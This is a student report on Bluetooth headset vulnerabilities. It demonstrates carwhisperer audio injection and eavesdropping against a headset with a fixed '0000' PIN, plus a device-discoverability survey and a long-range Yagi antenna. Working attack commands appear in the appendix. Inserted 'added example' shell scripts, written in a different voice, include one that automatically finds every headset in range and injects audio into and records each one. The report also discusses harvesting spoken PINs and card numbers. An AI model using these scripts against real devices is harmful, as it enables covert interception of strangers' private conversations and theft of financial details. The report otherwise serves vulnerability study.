
Bluetooth Vulnerabilities: A Demonstration Based Report

By Patrick Lloyd, Ryan Steinmetz, Matt Taber and Ben Walter


Abstract

This paper is the second part of a two-part report. The first part gave an overview of general Bluetooth vulnerabilities and the tools used to take advantage of them, covering many different methods with a main focus on Bluesnarfing and Bluetracking. In this second part we demonstrate at least one Bluetooth vulnerability with a set of software and hardware provided to us from a number of sources.

Introduction

As mentioned in the first part of this paper, Bluetooth is becoming an essential part of the technological world in which we live. It is built into a multitude of devices that we carry every day, from cell phones and laptop computers to headsets and even bracelets. Its range is anywhere from 1 meter to 100 meters depending on the power class of the radio, and even these figures can be extended with a simple antenna attached to a Bluetooth dongle. In this paper we demonstrate vulnerabilities that are inherent to Bluetooth, focusing mainly on injecting audio into a headset (referred to as "packet injection" in the rest of this paper), an attack that relies on a social element in addition to the technical vulnerability.

Hypothesis

We believe that we can inject sounds, or packets of information, into a PLT 510 Bluetooth headset merely by catching it in the middle of discovery with another audio device. There are ways to "crack" the device and inject packets without catching it in the middle of a pairing, but for the sake of this experiment we chose not to use such hacking techniques but rather those that would be more widely usable in the outside world.

Results

Complications

We originally planned to cover a multitude of demonstrations in this paper but ran into a number of problems while trying to perform them. The main complication was the very small budget for this experiment. In our original brainstorming we wanted to include a demonstration of Bluetracking, the use of three different Bluetooth nodes to triangulate where a Bluetooth device is located, but there is very little software available to do so for less than thousands of dollars. The software we were provided with was effective at scanning the immediate area for Bluetooth devices, but had no way to estimate how far a device was from the user. Due to our student status and the small budget of our department, other pieces of software were far out of our reach.

Successful Results

Despite the complications we ran into, we were able to demonstrate packet injection into a PLT 510 headset using only the built-in Bluetooth radio of a Dell Vostro 1500 laptop. There are a number of utilities on the internet, including a program called carwhisperer, that allow the user both to record from and to send audio to any headset it is able to connect to. The process begins with the Linux BlueZ "hcitool" utility, which is used to detect a headset or other Bluetooth device that may be in range. In the case of our PLT 510, the device had to be in pairing mode to be detected successfully. The problem with this, especially with the PLT 510 headset, is that it beeps in the earpiece, letting the user know that someone has detected or attempted to connect to the device. Most users would pass this off and ignore it as an error in the headset or a missed call which the device didn't register. This could be classified as a type of social attack, since the user allows the device to be paired despite being notified through the notification beep.

The other vulnerability which allows packets to be injected into the headset is that it uses the PIN "0000" for association by default. This PIN, along with "1234", is one of the most common PINs, with many headsets and devices shipped by the manufacturer with it as their default. The problem with the PLT 510 headset is that the PIN cannot be changed, an essential feature given the overall popularity of the two PINs. Because the headset has no keypad, the PIN is always supplied by the connecting device; an attacking machine configured to answer the pairing request with the default PIN therefore completes the pairing without anything being entered on either side.

The actual procedure for injecting packets, or for listening to the conversation the user is having, is a very simple one; the commands we used are given in Figure 1 of the appendix. While the headset is still in discoverable mode and the user is pairing it with their phone, a laptop can be set up within a 10 meter radius, the range of a class 2 device [1]. This could very easily take place in any public area, such as a park, the airport, a parking lot (where the car body reduces the usable range), or even a workplace. The laptop then receives notification that the headset is trying to find a pairing partner. No special procedure on the laptop is needed for this: if the laptop is within discoverable range of the headset, it picks the headset up automatically with a message that the headset wants to establish a pairing. A utility for constantly polling local-area devices is discussed later in the paper.


Once the laptop is paired with the headset, the audio properties of the laptop can be set to use the headset as the default recording device (Figure 2), the default playback device (Figure 1), or both. In our experiment the headset was used alternately for both tasks, but never for both at the same time. To inject a packet or sound into the headset (Figure 1), the laptop sets the headset as the default playback device and uses a sound player to play whatever sound is desired. In our experiment we were able to play the sample sound file included with carwhisperer into the headset while the user was having a conversation on the headset with another party, without the other party's knowledge or ability to hear it. This could be dangerous if the attacker could thereby get the second party to say something usable in a social attack, mainly because that party would be unaware that the first party was hearing the sound file.

To listen to the conversation happening over the headset (Figure 2), the laptop can be set to use the headset as the default recording device, and a sound recording program, in our case the built-in raw-file recording of carwhisperer, can be used to capture the conversation the user is having. The same can be done in a Windows environment with Windows' Sound Recorder.
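
The detection and injection steps described above, written out as a script. This is an added example, not the authors' script and not part of carwhisperer: it assumes BlueZ's hcitool on hci0 and a carwhisperer binary in the working directory, uses the argument order of the appendix script (hci number, file to inject, file to record, bdaddr, channel), and picks candidate headsets out of the inquiry result by their Bluetooth Class of Device instead of targeting one hard-coded address. The --live switch, the record-<bdaddr>.raw file names and the inquiry lines in the comments are my own constructions.

```shell
#!/bin/sh
# Added example (not the authors' code or carwhisperer's): pick discoverable
# headsets out of an inquiry by their Class of Device (CoD) and hand each one
# to carwhisperer with the same argument order as the appendix script.
# Assumed: BlueZ hcitool on hci0, ./carwhisperer in the working directory, and
# the headset profile on RFCOMM channel 1 (as in the appendix). The inquiry
# lines shown in comments are constructed.

# CoD layout: bits 2-7 minor device class, bits 8-12 major device class,
# bits 13-23 service classes. Major 0x04 is Audio/Video; within it, minor 0x01
# is "Wearable Headset Device" and 0x02 "Hands-free Device" (car kits).
cod_major() { printf '%d\n' $(( ($1 >> 8) & 0x1f )); }
cod_minor() { printf '%d\n' $(( ($1 >> 2) & 0x3f )); }

# Succeeds (exit 0) when the CoD describes a headset or hands-free unit.
cod_is_headset() {
    [ "$(cod_major "$1")" -eq 4 ] || return 1
    case "$(cod_minor "$1")" in
        1|2) return 0 ;;
        *)   return 1 ;;
    esac
}

# Read "hcitool inq" output on stdin and print "bdaddr cod" for each headset.
# A constructed sample line looks like:
#   00:03:89:93:F8:5D   clock offset: 0x4e4f   class: 0x200404
# The "Inquiring ..." header and anything that is not an address are skipped.
headsets_from_inq() {
    while read -r addr w1 w2 w3 w4 cls; do
        case "$addr" in
            [0-9A-Fa-f][0-9A-Fa-f]:[0-9A-Fa-f][0-9A-Fa-f]:*) ;;
            *) continue ;;
        esac
        [ -n "$cls" ] || continue
        if cod_is_headset "$cls"; then
            printf '%s %s\n' "$addr" "$cls"
        fi
    done
}

# For each "bdaddr cod" line on stdin, inject the audio file $1 (8 kHz, 16-bit
# signed mono raw, the format the appendix sox command converts from) and
# record what the headset microphone hears into record-<bdaddr>.raw.
attack_headsets() {
    while read -r addr cls; do
        echo "headset $addr (class $cls): injecting $1"
        ./carwhisperer 0 "$1" "record-$addr.raw" "$addr" 1
    done
}

# Live run (needs root and a headset in range):
#   ./find_headsets.sh --live message.raw
if [ "${1:-}" = "--live" ]; then
    hcitool -i hci0 inq | headsets_from_inq | attack_headsets "${2:-message.raw}"
fi
```

Filtering on the Class of Device matters in a crowded area: phones report major class 0x02 and would otherwise be handed to carwhisperer, which only speaks the headset profile.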

The recording could also be played back over the headset later, especially if a single headset has several users, for example a husband and wife. With careful observation and planning, this could be used to obtain the last four digits of a user's social security number (the primary identification for most billing services), bank account numbers, credit card numbers, or numeric PINs that are spoken out loud. As mentioned in the first part of the report, this could later be used for blackmail or other malicious deeds if the victim is then followed, or if their phonebook and calendar are obtained and compared with the conversation.

For the sake of this report, we also chose to track the number of Bluetooth devices found to be discoverable within two three-hour periods, one in a classroom building lounge and one in an open computing lab at Rochester Institute of Technology. The tracking was done as an update of a statistic reported in [2] from the 2004 CeBIT conference, where over the seven days of the conference a total of 5294 Bluetooth devices were detected as people merely walked by with their phones or other devices set to discoverable mode. The most frightening detail of that report is that approximately 70% of all devices found in the conference experiment were "vulnerable against SNARF attacks", SNARFing being the ability of an attacker to steal a victim's phone numbers and calendar information.

In our version of the experiment, every person passing by the scanning station was counted as part of the scan. This was based on the assumption that within the 30-second polling period, the person's device, if left in discoverable mode, would be scanned at least once. We found that of the 970 people passing through the classroom building lounge, only 14 had fully discoverable devices, and in the open computing lab 13 out of 84 had discoverable devices. In both cases the total was counted by hand and the number of devices was counted with BMon, a Bluetooth scanning utility by Center Media Solutions. Both figures may be off: the open computing lab contained a number of computers which may or may not have had Bluetooth capability, and there is human error in counting the people walking by while sitting in the classroom building lounge.
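
A polling survey of the kind described above, as an added example that is not the authors' BMon setup: every 30 seconds it runs one inquiry scan with BlueZ's hcitool, records each distinct BDADDR once together with the first and last poll in which it appeared, and reports how many distinct discoverable devices were observed over the period. The file format, the --live switch and the scan output used for checking it are my own constructions.

```shell
#!/bin/sh
# Added example (not the authors' BMon setup): repeated inquiry scans with a
# per-device first-seen/last-seen record. Assumed: BlueZ hcitool on the
# default adapter; the TSV layout below is my own.

POLL=30                  # the 30-second polling period used in the survey
SEEN=${SEEN:-seen.tsv}   # one line per device: bdaddr<TAB>first<TAB>last<TAB>name

# Tally one poll. stdin is "hcitool scan" output (a "Scanning ..." header, then
# one "<bdaddr><TAB><name>" line per device); $1 is the poll time in epoch
# seconds. Prints the number of addresses not seen in any earlier poll.
tally_poll() {
    now=$1; new=0
    [ -f "$SEEN" ] || : > "$SEEN"
    while read -r addr name; do
        case "$addr" in
            [0-9A-Fa-f][0-9A-Fa-f]:[0-9A-Fa-f][0-9A-Fa-f]:*) ;;
            *) continue ;;   # header, blank and malformed lines
        esac
        if awk -F '\t' -v a="$addr" '$1 == a { found = 1 } END { exit !found }' "$SEEN"; then
            # Known device: only move its last-seen time forward.
            awk -F '\t' -v OFS='\t' -v a="$addr" -v t="$now" \
                '$1 == a { $3 = t } { print }' "$SEEN" > "$SEEN.tmp" && mv "$SEEN.tmp" "$SEEN"
        else
            printf '%s\t%s\t%s\t%s\n' "$addr" "$now" "$now" "$name" >> "$SEEN"
            new=$((new + 1))
        fi
    done
    echo "$new"
}

# Number of distinct devices seen so far.
unique_count() { [ -f "$SEEN" ] && awk 'END { print NR }' "$SEEN" || echo 0; }

# Human-readable summary of the survey file.
report() {
    awk -F '\t' '{ printf "%s first=%s last=%s %s\n", $1, $2, $3, $4 }' "$SEEN"
    echo "distinct discoverable devices: $(unique_count)"
}

# Live run: ./survey.sh --live [seconds]   (default three hours, as in the survey)
if [ "${1:-}" = "--live" ]; then
    end=$(( $(date +%s) + ${2:-10800} ))
    while [ "$(date +%s)" -lt "$end" ]; do
        n=$(hcitool scan | tally_poll "$(date +%s)")
        echo "$(date '+%H:%M:%S') new=$n total=$(unique_count)"
        sleep "$POLL"
    done
    report
fi
```

Counting distinct addresses rather than hits per poll is what makes the figure comparable to a head count: a device that lingers through ten polls is still one person, and a device that is only caught once is still counted, which is the assumption the 30-second period rests on.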


Finally, as a proof of concept, we decided to test the "Bluetooth gun", a basic Yagi antenna attached to a paintball rifle stock. Our initial range tests with the rifle were not very impressive, as the range appeared to be limited to ten feet. A digital multimeter later revealed that the cable connecting the Bluetooth USB dongle to the antenna had its shield shorted to the center conductor, so the cable itself was acting as the antenna and the Yagi was not being used at all. We obtained a replacement coaxial cable through the professor supervising our experiments, de-soldered the existing cable from the USB Bluetooth dongle and soldered the new one on. The results were excellent: our initial ten-foot range increased to about three hundred feet, showing that we could exploit vulnerable devices from a much greater distance. While we were unable to test the sniffing ability we would gain from a re-flashed CSR Bluetooth dongle, we are confident that the antenna would make those results even more impressive and add extensive range to our packet injection abilities.

Discussion

As can be seen from the detection statistics in the second part of our results, manufacturers and users are both becoming smarter about the vulnerabilities of their Bluetooth devices and the security precautions that can be taken to keep them safe. Whereas a number of critics may say that leaving a phone in non-discoverable mode is not enough, against commercial software well within the budget of the average person it has been seen to be enough. (Non-discoverable mode only hides the device from inquiry scans; a device whose address is already known, for example from an earlier pairing, can still be connected to, so it is a mitigation rather than a complete defense.) As mentioned in the complications section of our report, a person who wants to crack a Bluetooth device that is not in discoverable mode, or triangulate the position of a person carrying a Bluetooth device, would need an extensive budget, certainly larger than that of four graduate students or a Networking, Security and Systems Administration department.

In contrast, there has not been enough exposure of headset vulnerabilities and the issue of having a pairing code of "0000" or "1234". These two pairing codes are still extremely popular, and therefore software such as carwhisperer is still very much able to inject audio into, or record audio from, such devices. As demonstrated in this paper, this can be done in a Linux distribution using carwhisperer, or even in Windows with the built-in sound recorder.

Conclusion

This paper has been our demonstration of Bluetooth vulnerabilities using a number of different techniques. We first used the program carwhisperer to inject packets, or sounds, into a PLT 510 headset, demonstrating that this is possible on a headset with the vulnerability of a fixed "0000" pairing code. We then demonstrated the "Bluetooth gun", which extends the range of an average Bluetooth dongle from 10 or 15 feet to approximately 300 feet. Finally, as a proof of concept and for additional conclusions, we surveyed Bluetooth devices in two different areas over a three-hour period each.

Acknowledgements

We thank Centermediasolutions.net for providing us with their software, BMon, which was extremely useful for scanning in our experiments as well as for detecting devices with the Bluetooth gun. It allowed us to detect Bluetooth devices without the delay that many other pieces of software, and software for use with built-in Bluetooth devices, exhibit. This software could easily be used with carwhisperer to find the BDADDR of devices and then inject sound packets into them without the user taking part in the pairing.

Appendix

play.sh:

#!/bin/sh
# play.sh: inject the raw audio file given as $1 into the headset and record
# what its microphone hears into results.raw. carwhisperer's arguments, in
# order, are <hci device number> <file to inject> <file to record>
# <headset bdaddr> [channel]; the address below is the PLT 510 used here.
./carwhisperer 0 "$1" results.raw 00:03:89:93:F8:5D 1

Figure 1: Code for insertion of sound packets into the headset

play_recording.sh:

#!/bin/sh
# play_recording.sh: convert the raw capture written by carwhisperer (8 kHz,
# 16-bit signed, mono) into a 44.1 kHz stereo WAV that any player can open.
# -s -w are sox's older spellings of -e signed-integer -b 16.
sox -t raw -r 8000 -c 1 -s -w ./results.raw -t wav -r 44100 -c 2 out.wav

Figure 2: Code for recording from headset and converting to a wav format

References

[1] Bialoglowy, Marek. "Bluetooth Security Review, Part 2." SecurityFocus, 26 May 2005. Accessed 16 Sept. 2008. <http://www.securityfocus.com/infocus/1836>.

[2] Haase, Marc, and Matthias Handy. "BlueTrack – Imperceptible Tracking of Bluetooth Devices." University of Rostock. Accessed 16 Sept. 2008. <http://ubicomp.org/ubicomp2004/adjunct/posters/haase.pdf>.
